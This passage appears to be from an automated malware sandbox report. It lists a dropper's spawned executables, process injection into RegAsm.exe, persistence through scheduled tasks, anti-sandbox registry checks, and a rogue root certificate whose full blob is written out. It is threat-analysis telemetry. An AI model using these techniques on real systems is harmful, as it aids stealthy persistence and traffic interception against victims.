WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3628 1368 WerFault.exe P1i57rTqyYvK8Wz1_NY_lX0m.exe 1996 1368 WerFault.exe P1i57rTqyYvK8Wz1_NY_lX0m.exe 1832 1368 WerFault.exe P1i57rTqyYvK8Wz1_NY_lX0m.exe 2880 2868 WerFault.exe RegAsm.exe 4552 1368 WerFault.exe P1i57rTqyYvK8Wz1_NY_lX0m.exe 4928 1368 WerFault.exe P1i57rTqyYvK8Wz1_NY_lX0m.exe 1464 1368 WerFault.exe P1i57rTqyYvK8Wz1_NY_lX0m.exe 4252 4320 WerFault.exe kwI5msI0GXCECMxCfATKQ50A.exe 1996 1368 WerFault.exe P1i57rTqyYvK8Wz1_NY_lX0m.exe 3300 4308 WerFault.exe RegAsm.exe 3644 1368 WerFault.exe P1i57rTqyYvK8Wz1_NY_lX0m.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
kwI5msI0GXCECMxCfATKQ50A.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 kwI5msI0GXCECMxCfATKQ50A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString kwI5msI0GXCECMxCfATKQ50A.exe -
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2268 schtasks.exe 2944 schtasks.exe 2820 schtasks.exe 1956 schtasks.exe 4468 schtasks.exe 4380 schtasks.exe 4720 schtasks.exe 2416 schtasks.exe 1888 schtasks.exe 1604 schtasks.exe 2008 schtasks.exe 3924 schtasks.exe 1592 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
GoLang User-Agent 3 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 330 Go-http-client/1.1 HTTP User-Agent header 324 Go-http-client/1.1 HTTP User-Agent header 325 Go-http-client/1.1 -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2388 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exewindefender.exetuZctSq25Sx46OCwloIdBXYG.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeKRtjXHn.exepowershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" tuZctSq25Sx46OCwloIdBXYG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" tuZctSq25Sx46OCwloIdBXYG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" tuZctSq25Sx46OCwloIdBXYG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" tuZctSq25Sx46OCwloIdBXYG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" tuZctSq25Sx46OCwloIdBXYG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" tuZctSq25Sx46OCwloIdBXYG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" tuZctSq25Sx46OCwloIdBXYG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" tuZctSq25Sx46OCwloIdBXYG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" tuZctSq25Sx46OCwloIdBXYG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" tuZctSq25Sx46OCwloIdBXYG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" tuZctSq25Sx46OCwloIdBXYG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" tuZctSq25Sx46OCwloIdBXYG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" tuZctSq25Sx46OCwloIdBXYG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{adc6c6aa-0000-0000-0000-d01200000000}\MaxCapacity = "14116" KRtjXHn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" tuZctSq25Sx46OCwloIdBXYG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" tuZctSq25Sx46OCwloIdBXYG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" tuZctSq25Sx46OCwloIdBXYG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" tuZctSq25Sx46OCwloIdBXYG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" tuZctSq25Sx46OCwloIdBXYG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2181 = "Astrakhan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" tuZctSq25Sx46OCwloIdBXYG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" tuZctSq25Sx46OCwloIdBXYG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" tuZctSq25Sx46OCwloIdBXYG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" tuZctSq25Sx46OCwloIdBXYG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" windefender.exe -
Processes:
RegAsm.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
GIRYqcKiZvhmj93nqNmYBOcU.exes4AaUwLl6DEajYQi5WVeMPx0.exeNYulW0N4e1hPawIOp4plsa35.exeK3WDl2xWvNNnkfn4nYdQExzq.exee02CHlRDyVx8CisrSUbTQs_u.exekwI5msI0GXCECMxCfATKQ50A.exeRegAsm.exepowershell.exedckuybanmlgp.exeMsBuild.exepowershell.exepowershell.exepowershell.exetuZctSq25Sx46OCwloIdBXYG.exepowershell.exetuZctSq25Sx46OCwloIdBXYG.exepid process 4964 GIRYqcKiZvhmj93nqNmYBOcU.exe 4964 GIRYqcKiZvhmj93nqNmYBOcU.exe 3520 s4AaUwLl6DEajYQi5WVeMPx0.exe 3520 s4AaUwLl6DEajYQi5WVeMPx0.exe 4648 NYulW0N4e1hPawIOp4plsa35.exe 4648 NYulW0N4e1hPawIOp4plsa35.exe 2668 K3WDl2xWvNNnkfn4nYdQExzq.exe 2668 K3WDl2xWvNNnkfn4nYdQExzq.exe 4492 e02CHlRDyVx8CisrSUbTQs_u.exe 4492 e02CHlRDyVx8CisrSUbTQs_u.exe 4320 kwI5msI0GXCECMxCfATKQ50A.exe 4320 kwI5msI0GXCECMxCfATKQ50A.exe 2784 RegAsm.exe 2784 RegAsm.exe 4648 NYulW0N4e1hPawIOp4plsa35.exe 4648 NYulW0N4e1hPawIOp4plsa35.exe 4648 NYulW0N4e1hPawIOp4plsa35.exe 4648 NYulW0N4e1hPawIOp4plsa35.exe 4648 NYulW0N4e1hPawIOp4plsa35.exe 468 powershell.exe 468 powershell.exe 4648 NYulW0N4e1hPawIOp4plsa35.exe 468 powershell.exe 4648 NYulW0N4e1hPawIOp4plsa35.exe 4648 NYulW0N4e1hPawIOp4plsa35.exe 3548 dckuybanmlgp.exe 3548 dckuybanmlgp.exe 3548 dckuybanmlgp.exe 3548 dckuybanmlgp.exe 3548 dckuybanmlgp.exe 3548 dckuybanmlgp.exe 3548 dckuybanmlgp.exe 4320 kwI5msI0GXCECMxCfATKQ50A.exe 4320 kwI5msI0GXCECMxCfATKQ50A.exe 3548 dckuybanmlgp.exe 2784 RegAsm.exe 2784 RegAsm.exe 2784 RegAsm.exe 2784 RegAsm.exe 4304 MsBuild.exe 4304 MsBuild.exe 2100 powershell.exe 2100 powershell.exe 2100 powershell.exe 1684 powershell.exe 1684 powershell.exe 1684 powershell.exe 4472 powershell.exe 4472 powershell.exe 4472 powershell.exe 3488 tuZctSq25Sx46OCwloIdBXYG.exe 3488 tuZctSq25Sx46OCwloIdBXYG.exe 4852 powershell.exe 4852 powershell.exe 4852 powershell.exe 580 tuZctSq25Sx46OCwloIdBXYG.exe 580 tuZctSq25Sx46OCwloIdBXYG.exe 580 tuZctSq25Sx46OCwloIdBXYG.exe 580 tuZctSq25Sx46OCwloIdBXYG.exe 580 tuZctSq25Sx46OCwloIdBXYG.exe 580 tuZctSq25Sx46OCwloIdBXYG.exe 580 tuZctSq25Sx46OCwloIdBXYG.exe 580 tuZctSq25Sx46OCwloIdBXYG.exe 580 tuZctSq25Sx46OCwloIdBXYG.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 672 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
RegAsm.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeMsBuild.exeWMIC.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 2784 RegAsm.exe Token: SeDebugPrivilege 468 powershell.exe Token: SeShutdownPrivilege 3516 powercfg.exe Token: SeCreatePagefilePrivilege 3516 powercfg.exe Token: SeShutdownPrivilege 1748 powercfg.exe Token: SeCreatePagefilePrivilege 1748 powercfg.exe Token: SeShutdownPrivilege 4588 powercfg.exe Token: SeCreatePagefilePrivilege 4588 powercfg.exe Token: SeShutdownPrivilege 3744 powercfg.exe Token: SeCreatePagefilePrivilege 3744 powercfg.exe Token: SeDebugPrivilege 4304 MsBuild.exe Token: SeBackupPrivilege 4304 MsBuild.exe Token: SeSecurityPrivilege 4304 MsBuild.exe Token: SeSecurityPrivilege 4304 MsBuild.exe Token: SeSecurityPrivilege 4304 MsBuild.exe Token: SeSecurityPrivilege 4304 MsBuild.exe Token: SeIncreaseQuotaPrivilege 556 WMIC.exe Token: SeSecurityPrivilege 556 WMIC.exe Token: SeTakeOwnershipPrivilege 556 WMIC.exe Token: SeLoadDriverPrivilege 556 WMIC.exe Token: SeSystemProfilePrivilege 556 WMIC.exe Token: SeSystemtimePrivilege 556 WMIC.exe Token: SeProfSingleProcessPrivilege 556 WMIC.exe Token: SeIncBasePriorityPrivilege 556 WMIC.exe Token: SeCreatePagefilePrivilege 556 WMIC.exe Token: SeBackupPrivilege 556 WMIC.exe Token: SeRestorePrivilege 556 WMIC.exe Token: SeShutdownPrivilege 556 WMIC.exe Token: SeDebugPrivilege 556 WMIC.exe Token: SeSystemEnvironmentPrivilege 556 WMIC.exe Token: SeRemoteShutdownPrivilege 556 WMIC.exe Token: SeUndockPrivilege 556 WMIC.exe Token: SeManageVolumePrivilege 556 WMIC.exe Token: 33 556 WMIC.exe Token: 34 556 WMIC.exe Token: 35 556 WMIC.exe Token: 36 556 WMIC.exe Token: SeIncreaseQuotaPrivilege 556 WMIC.exe Token: SeSecurityPrivilege 556 WMIC.exe Token: SeTakeOwnershipPrivilege 556 WMIC.exe Token: SeLoadDriverPrivilege 556 WMIC.exe Token: SeSystemProfilePrivilege 556 WMIC.exe Token: SeSystemtimePrivilege 556 WMIC.exe Token: SeProfSingleProcessPrivilege 556 WMIC.exe Token: SeIncBasePriorityPrivilege 556 WMIC.exe Token: SeCreatePagefilePrivilege 556 WMIC.exe Token: SeBackupPrivilege 556 WMIC.exe Token: SeRestorePrivilege 556 WMIC.exe Token: SeShutdownPrivilege 556 WMIC.exe Token: SeDebugPrivilege 556 WMIC.exe Token: SeSystemEnvironmentPrivilege 556 WMIC.exe Token: SeRemoteShutdownPrivilege 556 WMIC.exe Token: SeUndockPrivilege 556 WMIC.exe Token: SeManageVolumePrivilege 556 WMIC.exe Token: 33 556 WMIC.exe Token: 34 556 WMIC.exe Token: 35 556 WMIC.exe Token: 36 556 WMIC.exe Token: SeShutdownPrivilege 4480 powercfg.exe Token: SeCreatePagefilePrivilege 4480 powercfg.exe Token: SeShutdownPrivilege 1908 powercfg.exe Token: SeCreatePagefilePrivilege 1908 powercfg.exe Token: SeShutdownPrivilege 5088 powercfg.exe Token: SeCreatePagefilePrivilege 5088 powercfg.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
wup.exepid process 4944 wup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup.exe4dLTrXqtftUhIwJTRyHSSejV.exeQcMIl6J7oMLzdIxc7BHVgaQ9.exe9YVd8Opjg5kP29QMElKldZkn.exedescription pid process target process PID 4756 wrote to memory of 2668 4756 setup.exe K3WDl2xWvNNnkfn4nYdQExzq.exe PID 4756 wrote to memory of 2668 4756 setup.exe K3WDl2xWvNNnkfn4nYdQExzq.exe PID 4756 wrote to memory of 2668 4756 setup.exe K3WDl2xWvNNnkfn4nYdQExzq.exe PID 4756 wrote to memory of 3520 4756 setup.exe s4AaUwLl6DEajYQi5WVeMPx0.exe PID 4756 wrote to memory of 3520 4756 setup.exe s4AaUwLl6DEajYQi5WVeMPx0.exe PID 4756 wrote to memory of 3520 4756 setup.exe s4AaUwLl6DEajYQi5WVeMPx0.exe PID 4756 wrote to memory of 4492 4756 setup.exe e02CHlRDyVx8CisrSUbTQs_u.exe PID 4756 wrote to memory of 4492 4756 setup.exe e02CHlRDyVx8CisrSUbTQs_u.exe PID 4756 wrote to memory of 4492 4756 setup.exe e02CHlRDyVx8CisrSUbTQs_u.exe PID 4756 wrote to memory of 4884 4756 setup.exe 4dLTrXqtftUhIwJTRyHSSejV.exe PID 4756 wrote to memory of 4884 4756 setup.exe 4dLTrXqtftUhIwJTRyHSSejV.exe PID 4756 wrote to memory of 4884 4756 setup.exe 4dLTrXqtftUhIwJTRyHSSejV.exe PID 4756 wrote to memory of 2772 4756 setup.exe oqnIhEuqPWFLxfGfy_cozJKr.exe PID 4756 wrote to memory of 2772 4756 setup.exe oqnIhEuqPWFLxfGfy_cozJKr.exe PID 4756 wrote to memory of 2772 4756 setup.exe oqnIhEuqPWFLxfGfy_cozJKr.exe PID 4756 wrote to memory of 2104 4756 setup.exe gNaZnn5CLFQicjVhsTk8gKef.exe PID 4756 wrote to memory of 2104 4756 setup.exe gNaZnn5CLFQicjVhsTk8gKef.exe PID 4756 wrote to memory of 2104 4756 setup.exe gNaZnn5CLFQicjVhsTk8gKef.exe PID 4756 wrote to memory of 3116 4756 setup.exe kN3Wu8RUu2uTrcf2g49JbbJI.exe PID 4756 wrote to memory of 3116 4756 setup.exe kN3Wu8RUu2uTrcf2g49JbbJI.exe PID 4756 wrote to memory of 3116 4756 setup.exe kN3Wu8RUu2uTrcf2g49JbbJI.exe PID 4756 wrote to memory of 2268 4756 setup.exe D3wSlOtntlkjBD387yaruAqa.exe PID 4756 wrote to memory of 2268 4756 setup.exe D3wSlOtntlkjBD387yaruAqa.exe PID 4756 wrote to memory of 2268 4756 setup.exe D3wSlOtntlkjBD387yaruAqa.exe PID 4756 wrote to memory of 4744 4756 setup.exe QcMIl6J7oMLzdIxc7BHVgaQ9.exe PID 4756 wrote to memory of 4744 4756 setup.exe QcMIl6J7oMLzdIxc7BHVgaQ9.exe PID 4756 wrote to memory of 4744 4756 setup.exe QcMIl6J7oMLzdIxc7BHVgaQ9.exe PID 4756 wrote to memory of 4320 4756 setup.exe kwI5msI0GXCECMxCfATKQ50A.exe PID 4756 wrote to memory of 4320 4756 setup.exe kwI5msI0GXCECMxCfATKQ50A.exe PID 4756 wrote to memory of 4320 4756 setup.exe kwI5msI0GXCECMxCfATKQ50A.exe PID 4756 wrote to memory of 1368 4756 setup.exe P1i57rTqyYvK8Wz1_NY_lX0m.exe PID 4756 wrote to memory of 1368 4756 setup.exe P1i57rTqyYvK8Wz1_NY_lX0m.exe PID 4756 wrote to memory of 1368 4756 setup.exe P1i57rTqyYvK8Wz1_NY_lX0m.exe PID 4756 wrote to memory of 4964 4756 setup.exe GIRYqcKiZvhmj93nqNmYBOcU.exe PID 4756 wrote to memory of 4964 4756 setup.exe GIRYqcKiZvhmj93nqNmYBOcU.exe PID 4756 wrote to memory of 4964 4756 setup.exe GIRYqcKiZvhmj93nqNmYBOcU.exe PID 4756 wrote to memory of 3488 4756 setup.exe tuZctSq25Sx46OCwloIdBXYG.exe PID 4756 wrote to memory of 3488 4756 setup.exe tuZctSq25Sx46OCwloIdBXYG.exe PID 4756 wrote to memory of 3488 4756 setup.exe tuZctSq25Sx46OCwloIdBXYG.exe PID 4756 wrote to memory of 884 4756 setup.exe 9YVd8Opjg5kP29QMElKldZkn.exe PID 4756 wrote to memory of 884 4756 setup.exe 9YVd8Opjg5kP29QMElKldZkn.exe PID 4756 wrote to memory of 884 4756 setup.exe 9YVd8Opjg5kP29QMElKldZkn.exe PID 4756 wrote to memory of 4648 4756 setup.exe NYulW0N4e1hPawIOp4plsa35.exe PID 4756 wrote to memory of 4648 4756 setup.exe NYulW0N4e1hPawIOp4plsa35.exe PID 4884 wrote to memory of 4088 4884 4dLTrXqtftUhIwJTRyHSSejV.exe RegAsm.exe PID 4884 wrote to memory of 4088 4884 4dLTrXqtftUhIwJTRyHSSejV.exe RegAsm.exe PID 4884 wrote to memory of 4088 4884 4dLTrXqtftUhIwJTRyHSSejV.exe RegAsm.exe PID 4744 wrote to memory of 2784 4744 QcMIl6J7oMLzdIxc7BHVgaQ9.exe RegAsm.exe PID 4744 wrote to memory of 2784 4744 QcMIl6J7oMLzdIxc7BHVgaQ9.exe RegAsm.exe PID 4744 wrote to memory of 2784 4744 QcMIl6J7oMLzdIxc7BHVgaQ9.exe RegAsm.exe PID 4884 wrote to memory of 4088 4884 4dLTrXqtftUhIwJTRyHSSejV.exe RegAsm.exe PID 4884 wrote to memory of 4088 4884 4dLTrXqtftUhIwJTRyHSSejV.exe RegAsm.exe PID 4884 wrote to memory of 4088 4884 4dLTrXqtftUhIwJTRyHSSejV.exe RegAsm.exe PID 4884 wrote to memory of 4088 4884 4dLTrXqtftUhIwJTRyHSSejV.exe RegAsm.exe PID 4884 wrote to memory of 4088 4884 4dLTrXqtftUhIwJTRyHSSejV.exe RegAsm.exe PID 4884 wrote to memory of 4088 4884 4dLTrXqtftUhIwJTRyHSSejV.exe RegAsm.exe PID 4884 wrote to memory of 4088 4884 4dLTrXqtftUhIwJTRyHSSejV.exe RegAsm.exe PID 884 wrote to memory of 4784 884 9YVd8Opjg5kP29QMElKldZkn.exe is-VK0NS.tmp PID 884 wrote to memory of 4784 884 9YVd8Opjg5kP29QMElKldZkn.exe is-VK0NS.tmp PID 884 wrote to memory of 4784 884 9YVd8Opjg5kP29QMElKldZkn.exe is-VK0NS.tmp PID 4744 wrote to memory of 2784 4744 QcMIl6J7oMLzdIxc7BHVgaQ9.exe RegAsm.exe PID 4744 wrote to memory of 2784 4744 QcMIl6J7oMLzdIxc7BHVgaQ9.exe RegAsm.exe PID 4744 wrote to memory of 2784 4744 QcMIl6J7oMLzdIxc7BHVgaQ9.exe RegAsm.exe PID 4744 wrote to memory of 2784 4744 QcMIl6J7oMLzdIxc7BHVgaQ9.exe RegAsm.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
